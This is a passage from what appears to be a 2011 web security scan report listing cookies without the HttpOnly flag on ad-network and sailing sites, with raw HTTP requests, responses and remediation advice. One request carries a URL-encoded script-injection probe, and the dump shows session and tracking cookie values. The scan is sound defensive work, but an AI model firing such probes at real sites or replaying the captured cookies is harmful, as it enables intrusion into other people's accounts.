%29%3Bppv%28619%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28620%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3Bppv%28621%2C+%272154894015220863682%27%2C+1295482815%2C+1295569215%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; icu=EAAYAA..; acb303093=5_[r^XI()vrO@Pn0nf8MwM9g$?enc=pyOAm8UL4j-wuVlyyz3gPwAAAAAAAAhAsLlZcss94D-nI4CbxQviP9CL-hxz-rYyBWHfHSmrEELBfzdNAAAAAGI7AwA3AQAAZAAAAAIAAAA5UAIAPV0AAAEAAABVU0QAVVNEAKAAWAKqAQAAeggBAgUCAAUAAAAALyC12AAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482817%29%3Buf%28%27r%27%2C+151609%2C+1295482817%29%3Bppv%2882%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2884%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2811%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2882%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2884%2C+%273654383519972101072%27%2C+1295482817%2C+1305850817%2C+2132%2C+23869%29%3Bppv%2887%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28619%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28620%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3Bppv%28621%2C+%273654383519972101072%27%2C+1295482817%2C+1295569217%2C+2132%2C+23869%29%3B&cnd=!MR7WtAjUEBC5oAkYwI8BIL26ASgAMbKd76fGC-I_QhMIABAAGAAgASj-__________8BQg0IUhC54i4YoxkgAygGQg0IVBC5yTMYhwogAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7*@E:3F.0s]#%2L_'x%SEV/hnK7#=G#<huqu*`^-sAq$WUeUDuqkMr+c^Z(+ql_Y`mC^.fk]u+-ptW1B'#)hgVCgQw>7'NF7uNVkG0XN^BPJ.^ZXwcsDU[n.KmyD0IP?EJtun(LG%y$qg]mwnXkD%rDs0:0$Ob('INuCClbQ^7w=g32LzAgGCPGs/^Zf3+TaP
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /seg?add_code=impx-11265&member=30 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.sailinganarchy.com/index_page1.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; acb35548=5_[r^kI/7ZrO@Pn0nf8M8cp]i?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiP1729trACfBsBWHfHSmrEEIEfjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAA6AgBAgUCAAUAAAAA3yJj0gAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295482372%29%3Buf%28%27r%27%2C+151608%2C+1295482372%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2811%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2882%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2884%2C+%277849784874418763358%27%2C+1295482372%2C+1305850372%2C+2132%2C+23869%29%3Bppv%2887%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28619%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28620%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3Bppv%28621%2C+%277849784874418763358%27%2C+1295482372%2C+1295568772%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmUMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBpbb)jKuoIgTwzHPZ2[uGVGi2$WVP]vE7ilpu2(MPy%SF(w77BERA(EO4I(3<csJ3xssMeZG!7<'>q5Yjf
Response
HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:13:37 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:13:37 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:13:37 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG3H<cvjr/?0P(*AuB-u**g1:XIC8]UMbNTs4#%DBZoIf(PCR0ep_TvkXX49-qCQB:hlS?9mnBp47]h3?C^q0Wv5MQ*ZwB-!3PYw5C215#'1yq9A1-rNS-!<d=acxcxImXfqnsb.XDvw(L75^wACGY+1'U74=YF]n@)*InD4_+; path=/; expires=Wed, 20-Apr-2011 00:13:37 GMT; domain=.adnxs.com; HttpOnly Location: http://r.openx.net/set?pid=408c9df8-85fe-6893-4938-ccbfd204601e&rtb=4760492999213801733 Date: Thu, 20 Jan 2011 00:13:37 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.tuenti.com Proxy-Connection: keep-alive Referer: http://www.tuenti.com/share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ourl=%3Fm%3DShare%26url%3Dhttp%253A%252F%252Fwww.elmundo.es%252Felmundo%252F2011%252F01%252F17%252Fnautica%252F1295254542.html%26p%3D; keep_ru=1
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?m=login HTTP/1.1 Host: www.tuenti.com Proxy-Connection: keep-alive Referer: http://www.tuenti.com/?gotHash=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: keep_ru=1; ourl=%3F
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html HTTP/1.1 Host: www.tuenti.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.php HTTP/1.1 Host: americascup.mediaaccess.evolix.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:36:56 GMT Server: Apache Set-Cookie: PHPSESSID=f7dd62b0baadb91dcf47f180dfeb400d; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 60255
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Americas Cup Media</ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.php HTTP/1.1 Host: www.americascupmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:44:48 GMT Server: Apache Set-Cookie: PHPSESSID=5df83766a88aa55095427a70359ae9f4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 60255
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Americas Cup Media</ ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.beneteaucountdown.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /velux_5_oceans_2010_race/ HTTP/1.1 Host: www.w-w-i.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /event_results_cumulative.cfm HTTP/1.1 Host: www.yachtscoring.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 20 Jan 2011 00:54:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=6963848;expires=Sat, 12-Jan-2041 00:54:26 GMT;path=/ Set-Cookie: CFTOKEN=98037815;expires=Sat, 12-Jan-2041 00:54:26 GMT;path=/ Set-Cookie: CFID=6963848;path=/ Set-Cookie: CFTOKEN=98037815;path=/ location: ./select_event.cfm?CFID=6963848&CFTOKEN=98037815 Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
_uid="a104_5562153497824379009";expires=Fri, 20 Jan 2012 00:26:19 GMT;domain=.fwmrm.net;path=/;
_vr="1295483178..60536~60671~66149~103579~170504~173095~306401~,";expires=Sat, 19 Feb 2011 00:26:19 GMT;domain=.fwmrm.net;path=/;
_sc="sg23001.1295483179.1295483179.28800.0.0,";expires=Sat, 19 Feb 2011 00:26:19 GMT;domain=.fwmrm.net;path=/;
_wr="g23001";expires=Sat, 19 Feb 2011 00:26:19 GMT;domain=.fwmrm.net;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ad/g/1?nw=10274&pvrn=Insert%20Random%20Number%20Here&csid=display&resp=ad;;ptgt=s&envp=g_js&slid=Rectangle&w=300&h=250 HTTP/1.1 Host: 2822.v.fwmrm.net Proxy-Connection: keep-alive Referer: http://blip.tv/file/4639878 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _uid="a104_5562153497824379009"; _vr="1295039779..246255~312652~,"; _cph="1295039779.438.1.1,"; _sc="sg122034.1295039779.1295039779.28800.0.0,"; _wr="g122034"
The following cookies were issued by the application and do not have the HttpOnly flag set:
_uid="a104_5562153497824379009";expires=Fri, 20 Jan 2012 00:14:07 GMT;domain=.fwmrm.net;path=/;
_auv="g23001~1.1295482447.0,13310.1295482447.0,^";expires=Sat, 19 Feb 2011 00:14:07 GMT;domain=.fwmrm.net;path=/;
_vr="1295482435..60536~60671~66149~103579~170504~173095~306401~,";expires=Sat, 19 Feb 2011 00:14:07 GMT;domain=.fwmrm.net;path=/;
_sc="sg23001.1295482428.1295482447.28800.0.0,";expires=Sat, 19 Feb 2011 00:14:07 GMT;domain=.fwmrm.net;path=/;
_wr="g23001";expires=Sat, 19 Feb 2011 00:14:07 GMT;domain=.fwmrm.net;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ad/l/1?last=0&ct=0&metr=127&s=a116&t=12954824355285936&adid=170504&reid=79402&arid=0&auid=&cn=defaultImpression&et=i&_cc=170504,79402,11811.,11074.11081.11744.11811.,1295482435,1&tpos=0&iw=&uxnw=&uxss=&uxct=&init=1&cr= HTTP/1.1 Host: 2822.v.fwmrm.net Proxy-Connection: keep-alive Referer: http://a.blip.tv/scripts/flash/stratos.swf?file=http%3A//blip.tv/rss/flash/4658178%3Freferrer%3Dblip.tv%26source%3D1%26use_direct%3D1%26use_documents%3D1&enablejs=true&showplayerpath=http%3A//a.blip.tv/scripts/flash/stratos.swf&autostart=true&feedurl=http%3A//armchairmango.blip.tv/rss&playerUrl=http%3A//a.blip.tv/scripts/flash/stratos.swf&staggeredLoad=true&showinfo=false&enableHtml5Player=true Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _cph="1295039779.438.1.1,"; _sid="a116_5564054660803241609"; NSC_ozdbewjq3.gxnsn.ofu=ffffffff09091f3545525d5f4f58455e445a4a423209; _uid="a104_5562153497824379009"; _vr="1295482435..60536~60671~66149~103579~170504~173095~306401~,"; _sc="sg23001.1295482428.1295482436.28800.0.0,"; _wr="g23001"
Response
HTTP/1.1 200 OK Set-Cookie: _uid="a104_5562153497824379009";expires=Fri, 20 Jan 2012 00:14:07 GMT;domain=.fwmrm.net;path=/; Set-Cookie: _auv="g23001~1.1295482447.0,13310.1295482447.0,^";expires=Sat, 19 Feb 2011 00:14:07 GMT;domain=.fwmrm.net;path=/; Set-Cookie: _vr="1295482435..60536~60671~66149~103579~170504~173095~306401~,";expires=Sat, 19 Feb 2011 00:14:07 GMT;domain=.fwmrm.net;path=/; Set-Cookie: _sc="sg23001.1295482428.1295482447.28800.0.0,";expires=Sat, 19 Feb 2011 00:14:07 GMT;domain=.fwmrm.net;path=/; Set-Cookie: _wr="g23001";expires=Sat, 19 Feb 2011 00:14:07 GMT;domain=.fwmrm.net;path=/; Content-Type: text/html Content-Length: 0 Pragma: no-cache Date: Thu, 20 Jan 2011 00:14:06 GMT Server: FWS P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
The following cookies were issued by the application and do not have the HttpOnly flag set:
_uid="a104_5562153497824379009";expires=Fri, 20 Jan 2012 00:13:55 GMT;domain=.fwmrm.net;path=/;
_vr="1295482435..60536~60671~66149~103579~170504~173095~306401~,";expires=Sat, 19 Feb 2011 00:13:55 GMT;domain=.fwmrm.net;path=/;
_sc="sg23001.1295482428.1295482435.28800.0.0,";expires=Sat, 19 Feb 2011 00:13:55 GMT;domain=.fwmrm.net;path=/;
_wr="g23001";expires=Sat, 19 Feb 2011 00:13:55 GMT;domain=.fwmrm.net;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ad?asId=1000000238307&sd=2x728x90&ct=15&enc=1&nif=1&sf=0&sfd=0&ynw=0&anw=1&rand=89023115&rk1=28177253&rk2=1295482425.162&pt=0&asc=139x31&vad=950x996 HTTP/1.1 Host: ad.afy11.net Proxy-Connection: keep-alive Referer: http://www.sailinganarchy.com/index_page1.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: a=AZ7s9B85IkyRNDgbVDU-vg; c=AQEBAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*
Response
HTTP/1.0 200 OK Connection: close Cache-Control: no-cache, must-revalidate Server: AdifyServer Content-Type: text/javascript Content-Length: 1087 Set-Cookie: f=AgEBAAAAAAAMqJEHA343TQ==; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net; Set-Cookie: c=AQECAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00BAAEAdaTl1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net; P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"
The following cookie was issued by the application and does not have the HttpOnly flag set:
id=c653243310000d9|1044889/556043/14994|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click;h=v8/3a95/3/0/*/s;234980170;1-0;0;57570438;2321-160/600;40268054/40285841/1;u=,cm-93054228_1295482822,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l;~okv=;pc=DFP234824030;;~aopt=0/ff/ef/ff;~fdr=234824030;0-0;62;49633220;2321-160/600;40285688/40303475/1;u=,cm-93054228_1295482822,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l;~okv=;net=cm;u=,cm-93054228_1295482822,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l;;cmw=owl;sz=160x600;net=cm;ord1=405617;contx=sports;an=40;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sports_l;btg=cm.weath_l;~aopt=2/0/ef/0;~sscs=?http:/www.lexus.com/thehardway/?vidid=thw3&cid=THW11NBROBOT HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://www.lexus.com/thehardway/?vidid=thw3&cid=THW11NBROBOT Set-Cookie: id=c653243310000d9|1044889/556043/14994|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Thu, 20 Jan 2011 00:35:29 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
id=c653243310000d9|2201481/1047249/14994|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /clk;234517278;58326487;v;pc=[TPAS_ID] HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://www.sho.com/site/order/index.do?source=acq_m_jan?source=m_JAQ_1047249_58326487_0&utm_source=58326487&utm_medium=omddisplay&utm_content=0&utm_campaign=JAQ Set-Cookie: id=c653243310000d9|2201481/1047249/14994|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Thu, 20 Jan 2011 00:35:32 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: brxserv.btrll.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: DRN1=AGPX0VDzIfo; GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw
Response
HTTP/1.0 404 Not Found Date: Thu, 20 Jan 2011 00:28:43 GMT Server: Apache/2.0.63 (Unix) P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:28:43 GMT; path=/; domain=.btrll.com Content-Length: 161 Content-Type: text/html; charset=UTF-8
<html> <head> <title>Not Found</title> </head> <body> <h1>404 - Not Found</h1> Found unexpected '.' character in position 1 of path: /favicon.ico</body> </html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /v1/epix/2903/3844555/1938/2286/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001AD)%3C/script%3E HTTP/1.1 Host: brxserv.btrll.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: DRN1=AGPX0VDzIfo; GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw
Response
HTTP/1.0 404 Not Found Date: Thu, 20 Jan 2011 00:30:52 GMT Server: Apache/2.0.63 (Unix) P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:30:52 GMT; path=/; domain=.btrll.com Content-Length: 243 Content-Type: text/html; charset=UTF-8
<html> <head> <title>Not Found</title> </head> <body> <h1>404 - Not Found</h1> Missing parameter in position 7 of path: /v1/epix/2903/3844555/1938/2286/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.click/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2Nsay8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL25vbmUvO1ZpZGVvOzEyOTU0ODI0NDI]] HTTP/1.1 Host: brxserv.btrll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw; DRN1=AGPX0VDzIfo;
Response
HTTP/1.1 302 Found Date: Thu, 20 Jan 2011 00:40:06 GMT Server: Apache/2.0.63 (Unix) P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:40:06 GMT; path=/; domain=.btrll.com Expires: Tues, 01 Jan 1980 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: http://2901.btrll.com/clk/2901/4258/PreRoll.911.109723/none/;Video;1295482442 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.end/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL2RvbmU7VmlkZW87MTI5NTQ4MjQ0Mg HTTP/1.1 Host: brxserv.btrll.com Proxy-Connection: keep-alive Referer: http://a.blip.tv/scripts/flash/stratos.swf?file=http%3A//blip.tv/rss/flash/4658178%3Freferrer%3Dblip.tv%26source%3D1%26use_direct%3D1%26use_documents%3D1&enablejs=true&showplayerpath=http%3A//a.blip.tv/scripts/flash/stratos.swf&autostart=true&feedurl=http%3A//armchairmango.blip.tv/rss&playerUrl=http%3A//a.blip.tv/scripts/flash/stratos.swf&staggeredLoad=true&showinfo=false&enableHtml5Player=true Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: DRN1=AGPX0VDzIfo; GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw
Response
